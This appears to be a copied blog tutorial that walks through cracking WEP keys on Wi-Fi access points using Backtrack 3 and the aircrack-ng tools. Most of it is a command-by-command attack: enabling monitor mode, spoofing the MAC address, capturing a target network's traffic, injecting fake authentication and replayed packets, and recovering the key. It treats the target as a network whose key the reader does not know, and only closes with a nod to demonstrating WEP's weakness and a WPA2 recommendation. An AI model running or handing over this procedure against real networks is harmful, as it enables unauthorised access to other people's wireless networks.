This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.

Requirements:

    * Backtrack 3 on CD or USB
    * Computer with compatible 802.11 wireless card
    * Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card


First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:


modprobe -r iwl3945  

modprobe ipwraw


The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig


Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]


Then:

ifconfig down [interface]


Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]


Highslide JS

Its now time to start the card in monitor mode by doing:

airmon-ng start [device]


Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]


Highslide JS

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]


Highslide JS

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]


Highslide JS

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]


Highslide JS

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

Highslide JS

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]


Highslide JS

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap


The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

Highslide JS

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks.

Good luck! 

                                                                                                                                Nguồn : Tổng hợp